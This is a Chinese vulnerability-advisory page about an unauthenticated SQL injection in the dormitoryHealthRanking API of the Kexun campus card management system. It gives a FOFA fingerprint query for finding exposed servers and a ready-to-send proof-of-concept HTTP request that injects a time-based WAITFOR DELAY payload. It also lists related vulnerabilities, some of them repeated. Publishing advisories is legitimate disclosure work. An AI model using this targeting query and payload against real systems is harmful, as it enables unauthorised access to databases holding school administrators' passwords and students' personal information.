科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞

日期: 2024-07-22 | 影响软件: 科讯一卡通管理系统 | POC: 已公开

漏洞描述

科讯一卡通管理系统是一套集多种功能于一体的综合性管理系统。科讯图书馆综合管理云平台dormitoryHealthRanking存在SQL注入，未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

PoC代码

# 科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞



科讯校园一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞，未经身份验证的远程攻击者可以利用SQL注入漏洞获取数据库中的信息。



## fofa



```yaml

body="http://www.ahkxsoft.com/" && body="一卡通登录"

```



## poc



```yaml

GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

```

漏洞描述

PoC代码

相关漏洞推荐

科讯一卡通管理系统-DataService.asmx-存在SQL注入漏洞 无POC

科讯一卡通管理系统 get_sb_guanli SQL注入漏洞 无POC

科讯一卡通管理系统getRechargeToICCard存在信息泄露漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

科讯一卡通管理系统-DataService.asmx-存在SQL注入漏洞无POC

科讯一卡通管理系统 get_sb_guanli SQL注入漏洞无POC

科讯一卡通管理系统getRechargeToICCard存在信息泄露漏洞无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC